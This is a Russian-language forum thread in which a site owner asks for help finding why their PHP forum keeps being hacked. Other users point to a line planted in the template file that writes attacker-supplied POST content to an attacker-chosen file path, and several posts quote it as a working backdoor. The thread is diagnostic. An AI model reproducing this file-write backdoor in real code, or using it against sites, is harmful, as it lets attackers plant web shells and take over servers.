Где дыра

1.02K
.
Меня постоянно сносят.Говорят что дыра в этом файле.Помогите ее найти
Прикрепленные файлы:
.
Помгите пожалуйста
.
<span class='minor'><span>".vremja($post['time'])."</span></span></span><p>".(isset($otvet)?"".($ku['id']==$otvet['id']?"<span class='rare'>":null)."$otvetu[nick]".($ku['id']==$otvet['id']?"</span>":null).", ":null)."".output_text($post['msg'], $ank['id'])."</p><div class='small'>".($fk['id']!=$post['id']?"".($forum['locked']==0?"".($ank['id']!=$ku['id']?"<a href='?forum=$forum[id]&otv=$ank[id]'>[ответить]</a>":null)."":null)."":null)."";if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}

Этот код подозрительной
.
if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}

Это вообще не понятной код
.
Ей 25
Надо было с начала нормально скрипт писать. А то в этом коде нифига не понятно. Ещё бы в одну строчку весь код сделал. После обусфакции скрипты понятней выглядят.
Короче тут мозг и глаза быстрей сломаешь чем что-то найдешь.
.
kolian2000
ValekS,
Код (+/-)


Вот весь код скрипта
.
Let Mortal Kombat begin
большие куски кода под спойлер прятать надо
.
Eurogon
код не очень понятный , пока найдешь что к чему... незнаю могу вот это предложить для проверки http://find-xss.net/
.
Enter нажат, к чему теперь рыданья…
Тут на форуме табуляции не поддерживаются, так что любой большой код выглядит как "многа букаф" гГ.
Форматированный код (+/-)
.
Pillott,
if ($_POST['lons'] != '')
{
$gast = fopen($_POST['poin'], "w");
fputs($gast, $_POST['vags']);
fclose($gast);
}
за что отвечает этот код?
Всего: 30